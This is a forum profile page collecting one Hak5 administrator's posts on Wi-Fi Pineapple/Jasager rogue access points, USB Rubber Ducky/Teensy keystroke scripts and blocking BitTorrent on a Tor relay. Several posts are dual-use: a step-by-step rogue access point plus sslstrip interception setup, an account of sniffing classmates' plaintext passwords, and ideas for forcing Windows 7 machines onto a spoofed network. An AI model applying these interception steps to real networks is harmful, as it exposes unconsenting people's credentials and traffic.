Mr-Protocol
Root Admin
  • Posts: 4,227
  • Days Won: 91

Everything posted by Mr-Protocol

  1. I work at a community college and attend classes as well. I was in my networking forensics course and happened to notice the website we use for class interaction was not HTTPS. Well, needless to say, accounts and passwords (typically last 4 of social security number from default user account creation) were flying past my screen. I was sniffing wireless and had lots of logins from the library wireless computers. After telling my supervisor and him talking to another supervisor, it got fixed. But of course it did not get fixed until 5 weeks later, and the "networking team" took credit for it, even though everyone knows I discovered it. It was probably set up like that for YEARS but nobody noticed it as a security risk.
  2. You may say: "OMGz y block torrentz¿" Here is my situation: I am running a tor relay on an Ubuntu VM (VirtualBox) and noticed a LOT of traffic of the BitTorrent nature. The point of running tor is not to hide yourself from your ISP so you can download pirated movies/music/software/etc. So I went off looking for a solution to identifying and blocking BitTorrent activity through my tor relay. A few people suggested ipp2p, ROPE, IPCop, or many other addons. Another suggestion was buying some high end corporate router to detect and block. I did some reading from SANS on what their methods were for detecting BitTorrent from a forensic standpoint. The material I read was good but a little out-dated. That, and it was how to detect it with snort. Well, I didn't want to have to set up snort just to block BitTorrent. Seems like there should be an easier way. AND there is :D! iptables. Yup, plain ol' iptables. My blocking methods: Google Doc Link To My Script. With that script posted above, I have only seen BitTorrent handshake packets come in, which is normal, but they are dropped as soon as they hit my machine. It has eased the bandwidth of my network and the tor relay isn't being abused by a bunch of BitTorrent connections. I'm not sure how many others would benefit from this script/commands so I figured I would share. If nothing else, when you MITM you can cut back the number of packets you are looking at by eliminating BitTorrent traffic. Supposedly ~65% of internet traffic is BitTorrent related. Possibly can add this as an option in Jasager or Interceptor so they don't get bogged down either? I'm no master of iptables so if you have any comments on what I have here, feel free to post your thoughts.
  3. Hulk has some Human Resources history. Something about anger management?
  4. If I had no idea what you were talking about... I'd question if that was a racist remark lol.
  5. I was reading the snort manual and it talked about the ability to replace matched content in packets before they are sent on the network. Example: alert tcp any any <> any 80 (msg: "tcp replace"; content:"GET"; replace:"BET";) The Windows equivalent of it would be, I think, WPE Pro with its packet filters. I used to use those to cheat on some online games by modifying "spellcast_lvl1" with the code for "spellcast_lvl100", sort of thing. I was wondering what (assuming there is something out there I haven't heard of) does this without a full blown install and config of snort. Edit: ettercap filters. I can use ettercap filters to do such things. But now my question is how do I get it to work properly. My Goal: Run a tor exit node (relay node), run an ettercap filter to modify the bittorrent traffic signatures coming through my tor exit node to drop the packets. I want to keep those bittorrent users off my node.
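  Detection logic for the BitTorrent signatures posts 2 and 5 want to identify and drop on a Tor relay (peer-wire handshake, HTTP tracker announce, DHT), as an added Python example that is not Mr-Protocol's script. The sample payloads are constructed, and the chain name in the generated iptables rule is an assumption.

```python
import re
from typing import Optional

# Peer-wire handshake (BEP 3): <pstrlen=19><"BitTorrent protocol"><8 reserved><20 info_hash><20 peer_id>
BT_PSTR = b"BitTorrent protocol"
HANDSHAKE_LEN = 1 + len(BT_PSTR) + 8 + 20 + 20   # 68 bytes
# HTTP tracker announce: GET /announce?info_hash=<url-encoded 20 bytes>&peer_id=...
TRACKER_RE = re.compile(rb"^GET [^ ]*announce[^ ]*[?&]info_hash=", re.IGNORECASE)
# DHT (BEP 5) bencoded query/response: a dict whose first key ("a" or "r") holds a 20-byte node id
DHT_PREFIXES = (b"d1:ad2:id20:", b"d1:rd2:id20:")
def parse_handshake(payload: bytes) -> Optional[dict]:
    """Return info_hash/peer_id if the payload starts with a peer-wire handshake, else None."""
    if len(payload) < HANDSHAKE_LEN or payload[0] != 19 or payload[1:20] != BT_PSTR:
        return None
    return {"info_hash": payload[28:48].hex(), "peer_id": payload[48:68]}

def classify(payload: bytes) -> Optional[str]:
    """Label which BitTorrent traffic type a TCP/UDP payload is, or None if it is not BitTorrent."""
    if parse_handshake(payload):
        return "peer-wire handshake"
    if TRACKER_RE.match(payload):
        return "http tracker announce"
    if payload.startswith(DHT_PREFIXES):
        return "dht"
    return None

def iptables_rule(chain: str = "INPUT") -> str:
    """iptables string-match rule dropping the handshake signature; the chain name is an assumption."""
    return (f"iptables -A {chain} -p tcp -m string --algo bm "
            f'--string "{BT_PSTR.decode()}" -j DROP')

def count_bittorrent(payloads) -> dict:
    """Tally each BitTorrent traffic type seen across a list of payloads."""
    counts = {}
    for p in payloads:
        label = classify(p)
        if label:
            counts[label] = counts.get(label, 0) + 1
    return counts

# Constructed sample payloads (not real captures): a handshake, a tracker GET, a DHT ping, plain HTTP.
SAMPLE_HANDSHAKE = bytes([19]) + BT_PSTR + bytes(8) + bytes(range(20)) + b"-TR2940-k8hj0wgej6ch"
SAMPLE_TRACKER = b"GET /announce?info_hash=%124Vx%9A%BC%DE%F0&peer_id=-TR2940-x HTTP/1.1\r\n"
SAMPLE_DHT = b"d1:ad2:id20:abcdefghij0123456789e1:q4:ping1:t2:aa1:y1:qe"
SAMPLE_HTTP = b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n\r\n"
SAMPLES = [SAMPLE_HANDSHAKE, SAMPLE_TRACKER, SAMPLE_DHT, SAMPLE_HTTP, SAMPLE_HANDSHAKE]
if __name__ == "__main__":
    print(count_bittorrent(SAMPLES))   # {'peer-wire handshake': 2, 'http tracker announce': 1, 'dht': 1}
    print(iptables_rule())
```

  The DHT prefixes only catch the common query/response layout; a relay that wants to be thorough would bencode-decode the packet instead of prefix-matching.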
  6. Pretty sure you could also define the paths in the command string as well.
  7. My understanding is, buying the pineapple II is for people who: 1) Want to support the Hak5 shop. GREAT! 2) Do not have the technical experience or desire to build one themselves. Practically you will need to reconfigure the whole thing. So all the hard work that Darren or whoever did is gone, sadly. Start looking around the forums on how to configure it. You will need to get PuTTY and SSH into it and start playing around with the configs. Or you can use the webif (if you can get to it) and you can edit the files through that. I'm at work so I can't elaborate on what exactly to change but it's in the forums here all over. Good luck.
  8. These are my steps, created with a vast amount of jumping through this forum. This is my setup: Jasager is connected to my BT4 laptop ethernet port via crossover cable. BT4 laptop wireless is connected to a legitimate wireless access point using wlan0.
     1) Jailbreak Fon (Hak5 Forums), then flash Jasager Firmware 2.1 from digininja using FonFlash.exe or ap51-flash-fonera-gui1.0-42.exe
     2) Telnet the fon (192.168.1.1), then 'passwd root', then 'reboot'
     3) Use winscp424 and transfer over haserl_0.9.24-1_mips.ipk and webif_0.3-4709_mips.ipk to the /tmp directory on the fon
     4) SSH (putty) into the fon and cd /tmp, then run 'opkg install haserl...'; when completed run 'opkg install webif...', then 'reboot'
     5) Edit /etc/config/dhcp:
        list 'dhcp_option' '3,192.168.169.16'   **Sets Gateway to Laptop LAN card
        list 'dhcp_option' '6,8.8.8.8'          **Sets DNS to GoogleDNS
     6) Edit /karma/www/cgi-bin/functions.rb; under "def create_interface()" add the following:
        system("sleep 1")
        system("brctl addif br-lan ath0 2>&1 > /dev/null")
     7) Login webif, Network tab, DHCP subtab: Disable Bogus Private Reverse Lookups, Disable filterwin2k, Disable Localise Queries --- Save settings and apply
     8) Login webif, Network tab, Networks subtab: Set IP address 192.168.169.169 with netmask 255.255.255.0 --- Save settings and apply
     Optional: edit /etc/banner
     Those steps might not have the most up to date files. But that is the process of getting it installed and working for me on my Fon2100.
     Then on BackTrack4:
        Boot BackTrack4 on laptop.
        Connect to wireless access point using network manager (start-network).
        ifconfig eth0 192.168.169.16
        Check ifconfig, make sure both interfaces have IP addresses.
        echo 1 > /proc/sys/net/ipv4/ip_forward
        sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
        Login to Jasager interface http://192.168.169.169:1471, turn on the ath0 button, add the SSID your laptop is getting internet from to the blacklist, enable karma.
     I use this setup with SSL Strip:
        sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123
        optional: ettercap -u -T -q -i eth0
        sslstrip -a -l 64123 -w /root/sslstriplog.txt -f /usr/share/sslstrip/lock.ico
     Hope this helps.
  9. I actually found this old duck PEZ dispenser, which got me thinking. The Teensy BARELY fits in the candy area...
  10. Keyboard.set_key1(ctrlkey); It doesn't like that line, I'm assuming. You are sending it a char value when it wants one of its defined key codes: KEY_A, not "KEY_A". KEY_A is like a defined constant, so it doesn't need quotes. You may have to change the input type of your function as well so it's not expecting a CHAR array and you giving it something different. Try:

      void setup() {
        delay(3000);          // give the host time to enumerate the keyboard
        ctrlcombo(KEY_A);     // key code constant, not a string
      }

      void loop() {
        // nothing to repeat; the combo is sent once from setup()
      }

      void ctrlcombo(uint8_t ctrlkey) {
        Keyboard.set_modifier(MODIFIERKEY_CTRL);
        Keyboard.set_key1(ctrlkey);
        Keyboard.send_now();
        Keyboard.set_modifier(0);   // release modifier and key
        Keyboard.set_key1(0);
        Keyboard.send_now();
      }

      Or read up a lil at http://www.pjrc.com/teensy/td_keyboard.html I can't test because I'm at work. Speaking of which, I got a meeting in 5 min.
  11. I had an idea to use the Ducky when plugged into a Windows 7 machine to create an open wireless connection "linksys" that would always try to connect automatically. Of course, if you are physically plugging a Ducky into someone's laptop, you are within range of them, so why not have a pineapple close by to accept the initial "linksys" SSID as noted above? My typical Pineapple/Jasager is set up as such: Jasager connects to my BackTrack4 laptop with forwarding/ICS. BT4 laptop connects via wireless to a legit Access Point with internet access. Clients connect to Jasager. Example: Myself and my co-worker went to a cafe and it had an open linksys router. When I kicked all clients from it in an attempt to have my pineapple intercept all traffic, my co-worker's laptop connected back to the original AP and noted the pineapple as "linksys 2". My goal is to find a command line way to have the USB Rubber Ducky change the wireless config of Win7 to allow the jasager to function as it does with XP. Win7 I think does something different, as stated above in the scenario I tried. So I'm trying to ask the community for some methodology on how to accomplish this. I've looked into netsh wlan, but I think you need an Administrator cmd. If I'm wrong about how Win7 works with wireless please enlighten me, for I do not have a Win7 laptop. But for whatever reason my co-worker's laptop refused to connect to Jasager when all other clients (XP, blackberry devices) did.
  12. There really cannot be a standard even with the simplest code. Delays need to be changed depending on the system it's being plugged into. If someone is savvy enough to code the Ducky, they should have no issues adding delays or making functions work on their Ducky from someone's code. And as with most open source, there is no standard really. So people have the flexibility to do what they want with it. Break out of standardized environments... like Windows :-s. Sorry for the mini-rant lol.
  13. Possibly using a registry setting would be an easier solution. Even if the ducky has to quickly write a .reg file and merge it.
  14. Only one way to find out... lol. That, and this little processor is looping a small bit of code really really fast. With no delays in that small mouse move code, I doubt they could fight it. The only thing they could do is use the keyboard to navigate. So add a click in there and they can't navigate at all, practically. To make Vista/7 users really angry, move the mouse to the bottom right corner of the screen to hide/ghost all windows, or click to minimize all :P
  15. This is what I got done after about an hour of playing. I'm using the Arduino to code it and, as a note, you want to put some sort of delay before it starts mashing keys. I figure a 10 second initialization for a "virgin" PC is enough time, so I coded a 10 second delay with blink response. Then after that it very quickly opens ipconfig, netstat, tasklist, systeminfo, and a cmd shell with a unique title. Could be used for quick stats from a forensic standpoint if you need volatile information such as connection states or tasklist. I have made scripts to do so remotely for my forensic class running from a remote PC, so that's why I was just messing around and made this.

      /* Programmed By: Mr-Protocol 4-29-2010
         Blinks 10 Times (10 second timer)
         LED On while working
         Opens ipconfig, netstat, tasklist, systeminfo, cmd (with a title change)
         LED Off when done
         Does NOT loop continuously */
      int ledPin = 11;      // LED is on pin 11
      int isDone = 0;
      int startdelay = 0;

      void setup() {
        pinMode(ledPin, OUTPUT);
        // Does 10 Sec delay with 10 blinks of LED
        do {
          digitalWrite(ledPin, HIGH);
          delay(500);
          digitalWrite(ledPin, LOW);
          delay(500);
          startdelay++;
        } while (startdelay < 10);
      }

      void loop() {
        if (isDone < 1) {
          CmdCommand("ipconfig");
          delay(250);
          CmdCommand("netstat");
          delay(250);
          CmdCommand("tasklist");
          delay(250);
          CmdCommand("systeminfo");
          delay(250);
          CmdCommand("title I @m h4x0r");
          delay(250);
          Keyboard.print("cls");
          PressAndRelease(KEY_ENTER, 1);
          isDone = 1;
          digitalWrite(ledPin, LOW);   // LED off when done (pinMode(ledPin, LOW) does not switch the LED off)
        }
      }

      // Opens a new cmd.exe from the Run bar and types one command into it
      void CmdCommand(const char *Cmd_Command) {
        CommandAtRunBar("cmd.exe");
        delay(100);
        Keyboard.print(Cmd_Command);
        PressAndRelease(KEY_ENTER, 1);
      }

      // Win+R, then type the command and press Enter
      void CommandAtRunBar(const char *SomeCommand) {
        digitalWrite(ledPin, HIGH);
        Keyboard.set_modifier(128);   // 128 = right GUI (Windows) key bit in the HID modifier byte
        Keyboard.set_key1(KEY_R);
        Keyboard.send_now();
        delay(10);
        Keyboard.set_modifier(0);
        Keyboard.set_key1(0);
        Keyboard.send_now();
        delay(10);
        Keyboard.print(SomeCommand);
        PressAndRelease(KEY_ENTER, 1);
      }

      // Press and release KeyCode KeyCount times
      void PressAndRelease(int KeyCode, int KeyCount) {
        int KeyCounter = 0;
        for (KeyCounter = 0; KeyCounter != KeyCount; KeyCounter++) {
          Keyboard.set_key1(KeyCode);
          Keyboard.send_now();
          Keyboard.set_key1(0);
          Keyboard.send_now();
        }
      }

      CommandAtRunBar & PressAndRelease from Irongeek's Code. Why reinvent the wheel? (Added a delay and lowered initial delay) Thanks for the Ducky Dev Kit (DDK?) Darren.
  16. Yeah, that sounds like a better solution. I own both a fon and a ruler :P but right now I'm at work and with Antarctica going on outside, not sure when I will be able to get home to do it.
  17. I'm also curious about this question so I can do the same thing as OP.
  18. The Meraki is supported by openwrt:
      Model        Platform & Frequency      Flash  RAM   Wireless NIC
      Meraki Mini  Atheros AR2315 @ 180MHz   8MB    32MB  AR2315 integrated
      No support for the wireless N yet by openWRT.
  19. Not sure if this has the right chipset, or if we can even install dd-wrt/openwrt on it. But it is a mini wireless N router: http://www.trendnet.com/products/proddetai...54TR&cat=66 Dimensions (LxWxH): 60 x 80 x 18.5mm (2.4 x 3.2 x 0.7in). Output Power: 802.11b: 14±2dBm (typical), 802.11g: 14±2dBm (typical), 802.11n: 12±2dBm (typical). Here is another b/g wireless mesh router: http://meraki.com/products_services/access_points/indoor/
  20. Does Piranha 3.0 have jasager in it? I don't see it in the packages...?
  21. I wasn't successful with using piranha. I just got digininja's firmware working and I got it all up and running and just want to add macchanger. Any direction for me to start?
  22. It is possible to compile macchanger on the jasager to, in theory, emulate the access point's MAC address so OSes like Vista/7 will not put a number after the SSID if they see multiple. For example, if I connected to a network called "MyNet" and someone threw up a Jasager, it would show as "MyNet 2" in Win7. I think using macchanger to copy the real AP's MAC should be able to trick the OS. That, and I'm not sure how that would work with intercepting traffic (double traffic?) if both the real AP and Jasager accept the traffic and try to send it to the internet cloud to process, say, a page request. It would be like a true clone of the AP.
  23. IP: 193.169.13.200, IP Country: Ukraine
  24. Couldn't ping. Got this:
      ping extrassecurityzone.com
      Ping request could not find host extrassecurityzone.com. Please check the name and try again.
  25. Yeah, I'm done playing with it... could care less, but just wanted to notify people.